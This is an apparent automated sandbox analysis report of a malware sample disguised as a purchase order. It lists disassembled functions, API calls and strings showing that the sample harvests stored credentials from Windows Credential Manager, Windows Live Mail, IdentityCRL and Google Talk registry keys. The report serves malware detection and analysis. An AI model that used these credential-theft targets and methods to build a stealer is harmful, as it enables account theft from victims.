                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID: h4ND$kGu
                                                              • API String ID: 3662548030-565523899
                                                              • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                              • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                              • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                              • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                              • API String ID: 2768085393-1693574875
                                                              • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                              • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              • Store Root, xrefs: 004443A5
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 832325562-2578778931
                                                              • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                              • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F567
                                                              • memset.MSVCRT ref: 0040F57F
                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                              • String ID:
                                                              • API String ID: 2012582556-3916222277
                                                              • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                              • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 331 40f96c-40f991 call 4070ae 334 40f993 331->334 335 40f998-40f9ab call 4045db 331->335 334->335 338 40f9b1-40f9bd 335->338 339 40faee-40fafd call 404656 335->339 341 40f9d1 338->341 342 40f9bf-40f9cf CredEnumerateW 338->342 344 40f9d3-40f9d5 341->344 342->344 344->339 345 40f9db-40f9e5 344->345 346 40fae6 345->346 347 40f9eb 345->347 346->339 348 40f9f0-40f9fb 347->348 349 40fa01-40fa04 348->349 350 40fad3-40fae0 348->350 349->350 351 40fa0a-40fa0d 349->351 350->346 350->348 351->350 352 40fa13-40fa3d memset WideCharToMultiByte 351->352 352->350 353 40fa43-40fa59 _strnicmp 352->353 353->350 354 40fa5b-40fa86 WideCharToMultiByte 353->354 355 40fa88-40faa6 WideCharToMultiByte 354->355 356 40faad-40fab4 354->356 355->356 357 40fab6-40facb 356->357 358 40facd-40fad0 356->358 357->350 358->350
                                                              APIs
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040F9CB
                                                              • memset.MSVCRT ref: 0040FA1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$CredEnumerateVersion_strnicmpmemset
                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                              • API String ID: 4107456500-3589380929
                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 360 4037ca-40381c memset * 2 call 444551 363 4038e2-4038e5 360->363 364 403822-403882 call 4021b6 call 406f06 * 2 strchr 360->364 371 403884-403895 _mbscpy 364->371 372 403897-4038a2 strlen 364->372 374 4038bf-4038dd _mbscpy call 4023e5 371->374 373 4038a4-4038bc sprintf 372->373 372->374 373->374 374->363
                                                              APIs
                                                              • memset.MSVCRT ref: 004037EB
                                                              • memset.MSVCRT ref: 004037FF
                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                              • strchr.MSVCRT ref: 0040386E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                              • strlen.MSVCRT ref: 00403897
                                                              • sprintf.MSVCRT ref: 004038B7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                              • String ID: %s@yahoo.com
                                                              • API String ID: 317221925-3288273942
                                                              • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                              • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 376 4034e4-403544 memset * 2 call 410b1e 379 403580-403582 376->379 380 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 376->380 380->379
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 3071782539-966475738
                                                              • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                              • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 385 40f6e2-40f70a call 40466b call 4045db 390 40f710-40f717 call 404734 385->390 391 40f7e9-40f801 call 404656 call 404785 385->391 390->391 396 40f71d-40f72e CredReadA 390->396 396->391 398 40f734-40f73a 396->398 400 40f740-40f743 398->400 401 40f7e5 398->401 400->401 402 40f749-40f759 400->402 401->391 403 40f75a-40f770 402->403 403->403 404 40f772-40f795 call 4047a5 403->404 407 40f7e2 404->407 408 40f797-40f7b6 WideCharToMultiByte 404->408 407->401 409 40f7b8-40f7c6 strlen 408->409 410 40f7d9-40f7dc LocalFree 408->410 409->410 411 40f7c8-40f7d8 _mbscpy 409->411 410->407 411->410
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 4000595657-3671122194
                                                              • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 412 40ccd7-40cd06 ??2@YAPAXI@Z 413 40cd08-40cd0d 412->413 414 40cd0f 412->414 415 40cd11-40cd24 ??2@YAPAXI@Z 413->415 414->415 416 40cd26-40cd2d call 404025 415->416 417 40cd2f 415->417 419 40cd31-40cd57 416->419 417->419 420 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 419->420 421 40cd59-40cd60 DeleteObject 419->421 421->420
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                              • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                              • DeleteObject.GDI32(?), ref: 0040CD5A
                                                              • memset.MSVCRT ref: 0040CD96
                                                              • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                              • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:
                                                              • API String ID: 2054149589-0
                                                              • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                              • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 44b40e-44b415 GetModuleHandleA 430 44b455 429->430 431 44b417-44b426 call 44b42b 429->431 433 44b457-44b45b 430->433 440 44b48d 431->440 441 44b428-44b433 GetProcAddress 431->441 435 44b45d-44b465 GetModuleHandleA 433->435 436 44b49a call 44b49f 433->436 439 44b467-44b46f 435->439 439->439 442 44b471-44b474 439->442 444 44b48e-44b496 440->444 441->430 445 44b435-44b442 VirtualProtect 441->445 442->433 443 44b476-44b478 442->443 446 44b47e-44b486 443->446 447 44b47a-44b47c 443->447 453 44b498 444->453 449 44b454 445->449 450 44b444-44b452 VirtualProtect 445->450 451 44b487-44b488 GetProcAddress 446->451 447->451 449->430 450->449 451->440 453->442
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                              Strings
                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                              • String ID: Software\Google\Google Talk\Accounts
                                                              • API String ID: 1366857005-1079885057
                                                              • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                              • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
